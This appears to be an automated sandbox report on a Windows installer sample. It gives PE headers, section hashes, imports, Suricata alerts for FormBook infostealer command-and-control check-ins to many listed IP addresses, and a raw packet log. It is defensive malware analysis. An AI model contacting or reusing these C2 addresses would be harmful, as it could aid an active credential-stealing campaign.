                                                                                                                                                                              Data Directories

                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000xb48.rsrc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                              Sections

                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              .text0x10000x656c0x660012117ad2476c7a7912407af0dcfcb8a7False0.6737515318627451data6.47208759712619IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .rdata0x80000x13980x1400e3e8d62e1d2308b175349eb9daa266c8False0.4494140625data5.137750894959169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .data0xa0000x39eb780x6002020ca26e010546720fd467c5d087b57unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .ndata0x3a90000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .rsrc0x3c70000xb480xc0013d9a87cc14830e1f01c641a62386bbeFalse0.4215494791666667data4.357284806500026IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                              Resources

                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                              RT_ICON0x3c71c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                                                                                              RT_DIALOG0x3c74a80x100dataEnglishUnited States0.5234375
                                                                                                                                                                              RT_DIALOG0x3c75a80x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                              RT_DIALOG0x3c76c80xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                              RT_DIALOG0x3c77900x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                              RT_GROUP_ICON0x3c77f00x14dataEnglishUnited States1.2
                                                                                                                                                                              RT_MANIFEST0x3c78080x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                                                                              Imports

                                                                                                                                                                              DLLImport
                                                                                                                                                                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                                                                              Possible Origin

                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                              Network Behavior

                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2025-01-11T03:53:23.819296+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980174.48.143.8280TCP
                                                                                                                                                                              2025-01-11T03:53:23.819296+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049785208.91.197.3980TCP
                                                                                                                                                                              2025-01-11T03:53:23.819296+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049857208.91.197.3980TCP
                                                                                                                                                                              2025-01-11T03:53:23.819296+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049856208.91.197.3980TCP
                                                                                                                                                                              2025-01-11T03:53:23.819296+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049784208.91.197.3980TCP
                                                                                                                                                                              2025-01-11T03:53:23.819296+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049858208.91.197.3980TCP
                                                                                                                                                                              2025-01-11T03:53:23.819296+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049783208.91.197.3980TCP
                                                                                                                                                                              2025-01-11T03:54:04.926119+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049757122.201.127.17443TCP
                                                                                                                                                                              2025-01-11T03:54:45.568527+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204975876.223.54.14680TCP
                                                                                                                                                                              2025-01-11T03:55:01.176956+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049759209.74.77.10980TCP
                                                                                                                                                                              2025-01-11T03:55:03.881805+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049760209.74.77.10980TCP
                                                                                                                                                                              2025-01-11T03:55:06.581594+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049761209.74.77.10980TCP
                                                                                                                                                                              2025-01-11T03:55:09.280919+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049762209.74.77.10980TCP
                                                                                                                                                                              2025-01-11T03:55:15.332388+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976327.124.4.24680TCP
                                                                                                                                                                              2025-01-11T03:55:18.147796+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976427.124.4.24680TCP
                                                                                                                                                                              2025-01-11T03:55:20.970815+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976527.124.4.24680TCP
                                                                                                                                                                              2025-01-11T03:55:23.809286+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204976627.124.4.24680TCP
                                                                                                                                                                              2025-01-11T03:55:29.636004+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976746.30.211.3880TCP
                                                                                                                                                                              2025-01-11T03:55:32.403975+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976846.30.211.3880TCP
                                                                                                                                                                              2025-01-11T03:55:35.140069+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976946.30.211.3880TCP
                                                                                                                                                                              2025-01-11T03:55:37.881023+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204977046.30.211.3880TCP
                                                                                                                                                                              2025-01-11T03:55:43.439727+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049771103.224.182.24280TCP
                                                                                                                                                                              2025-01-11T03:55:46.131151+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049772103.224.182.24280TCP
                                                                                                                                                                              2025-01-11T03:55:48.839680+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049773103.224.182.24280TCP
                                                                                                                                                                              2025-01-11T03:55:51.550443+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049774103.224.182.24280TCP
                                                                                                                                                                              2025-01-11T03:56:05.828727+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049775101.35.209.18380TCP
                                                                                                                                                                              2025-01-11T03:56:08.682285+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049776101.35.209.18380TCP
                                                                                                                                                                              2025-01-11T03:56:11.511147+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049777101.35.209.18380TCP
                                                                                                                                                                              2025-01-11T03:56:14.334123+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049778101.35.209.18380TCP
                                                                                                                                                                              2025-01-11T03:56:20.357203+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049779154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T03:56:23.194046+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049780154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T03:56:26.024403+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049781154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T03:56:28.848208+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049782154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T03:56:43.045554+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049786208.91.197.3980TCP
                                                                                                                                                                              2025-01-11T03:56:49.523833+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978743.205.198.2980TCP
                                                                                                                                                                              2025-01-11T03:56:52.407065+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978843.205.198.2980TCP
                                                                                                                                                                              2025-01-11T03:56:55.278593+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978943.205.198.2980TCP
                                                                                                                                                                              2025-01-11T03:56:58.145411+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204979043.205.198.2980TCP
                                                                                                                                                                              2025-01-11T03:57:04.914307+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049791104.21.40.16780TCP
                                                                                                                                                                              2025-01-11T03:57:07.554421+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049792104.21.40.16780TCP
                                                                                                                                                                              2025-01-11T03:57:10.194586+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049793104.21.40.16780TCP
                                                                                                                                                                              2025-01-11T03:57:50.189413+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049794104.21.40.16780TCP
                                                                                                                                                                              2025-01-11T03:57:55.926131+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049795172.67.167.14680TCP
                                                                                                                                                                              2025-01-11T03:57:58.584754+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049796172.67.167.14680TCP
                                                                                                                                                                              2025-01-11T03:58:01.255991+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049797172.67.167.14680TCP
                                                                                                                                                                              2025-01-11T03:58:03.907573+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049798172.67.167.14680TCP
                                                                                                                                                                              2025-01-11T03:58:09.523718+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979974.48.143.8280TCP
                                                                                                                                                                              2025-01-11T03:58:12.216537+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980074.48.143.8280TCP
                                                                                                                                                                              2025-01-11T03:58:17.620504+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204980274.48.143.8280TCP
                                                                                                                                                                              2025-01-11T03:58:23.737850+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049803134.0.14.15880TCP
                                                                                                                                                                              2025-01-11T03:58:26.487680+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049804134.0.14.15880TCP
                                                                                                                                                                              2025-01-11T03:58:29.262425+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049805134.0.14.15880TCP
                                                                                                                                                                              2025-01-11T03:58:31.955137+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049806134.0.14.15880TCP
                                                                                                                                                                              2025-01-11T03:58:38.580625+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980713.248.169.4880TCP
                                                                                                                                                                              2025-01-11T03:58:42.261542+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980813.248.169.4880TCP
                                                                                                                                                                              2025-01-11T03:58:45.934839+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980913.248.169.4880TCP
                                                                                                                                                                              2025-01-11T03:58:50.627514+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981013.248.169.4880TCP
                                                                                                                                                                              2025-01-11T03:59:00.369045+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049811202.92.5.2380TCP
                                                                                                                                                                              2025-01-11T03:59:08.678068+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981276.223.54.14680TCP
                                                                                                                                                                              2025-01-11T03:59:11.335536+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981376.223.54.14680TCP
                                                                                                                                                                              2025-01-11T03:59:14.010948+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981476.223.54.14680TCP
                                                                                                                                                                              2025-01-11T03:59:17.698245+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981576.223.54.14680TCP
                                                                                                                                                                              2025-01-11T03:59:23.068250+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049816209.74.77.10980TCP
                                                                                                                                                                              2025-01-11T03:59:25.769546+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049817209.74.77.10980TCP
                                                                                                                                                                              2025-01-11T03:59:28.475160+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049818209.74.77.10980TCP
                                                                                                                                                                              2025-01-11T03:59:31.176179+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049819209.74.77.10980TCP
                                                                                                                                                                              2025-01-11T03:59:41.789744+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982727.124.4.24680TCP
                                                                                                                                                                              2025-01-11T03:59:44.633395+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982927.124.4.24680TCP
                                                                                                                                                                              2025-01-11T03:59:47.429103+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983027.124.4.24680TCP
                                                                                                                                                                              2025-01-11T03:59:50.277219+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983127.124.4.24680TCP
                                                                                                                                                                              2025-01-11T03:59:55.740908+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983246.30.211.3880TCP
                                                                                                                                                                              2025-01-11T03:59:58.492319+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983346.30.211.3880TCP
                                                                                                                                                                              2025-01-11T04:00:01.239378+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983446.30.211.3880TCP
                                                                                                                                                                              2025-01-11T04:00:03.991441+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983546.30.211.3880TCP
                                                                                                                                                                              2025-01-11T04:00:09.347195+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049837103.224.182.24280TCP
                                                                                                                                                                              2025-01-11T04:00:12.052651+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049838103.224.182.24280TCP
                                                                                                                                                                              2025-01-11T04:00:14.729798+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049839103.224.182.24280TCP
                                                                                                                                                                              2025-01-11T04:00:17.434038+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049840103.224.182.24280TCP
                                                                                                                                                                              2025-01-11T04:01:55.768799+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049848101.35.209.18380TCP
                                                                                                                                                                              2025-01-11T04:01:58.587138+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049849101.35.209.18380TCP
                                                                                                                                                                              2025-01-11T04:02:01.448165+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049850101.35.209.18380TCP
                                                                                                                                                                              2025-01-11T04:02:04.289281+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049851101.35.209.18380TCP
                                                                                                                                                                              2025-01-11T04:02:09.905500+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049852154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T04:02:12.730647+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049853154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T04:02:15.561790+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049854154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T04:02:18.380678+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049855154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T04:02:32.210110+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049859208.91.197.3980TCP

                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                              TCP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Jan 11, 2025 03:54:03.666378021 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:03.666416883 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:03.666619062 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:03.678517103 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:03.678535938 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:04.313666105 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:04.313848972 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:04.313848972 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:04.345488071 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:04.345506907 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:04.345834017 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:04.346000910 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:04.348279953 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:04.390247107 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:04.926126003 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:04.926161051 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:04.926315069 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:04.926315069 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:04.926342964 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:04.926359892 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:04.926359892 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:04.926436901 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:04.926512003 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.234086037 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.234097958 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.234294891 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.234333038 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.234689951 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.234855890 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.234855890 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.234893084 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.234894037 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.234994888 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.235511065 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.235666990 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.235666990 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.235706091 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.235706091 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.235784054 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.271507025 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.271667004 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.271667004 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.271699905 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.271699905 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.271780014 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.542845011 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.542851925 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.543006897 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.543006897 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.543039083 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.543039083 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.543039083 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.543414116 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.543575048 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.543575048 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.543605089 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.543605089 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.543683052 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.544106960 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.544250011 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.544250965 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.544281006 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.544281006 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.544281006 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.545007944 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.545186043 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.545186043 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.545216084 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.545216084 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.545643091 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.545804024 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.545886040 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.579555988 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.579724073 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.579724073 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.579752922 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.579830885 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.580315113 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.580513000 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.580538988 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.851058006 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.851067066 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.851255894 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.851408958 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.851706028 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.851876974 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.851876974 CET49757443192.168.11.20122.201.127.17
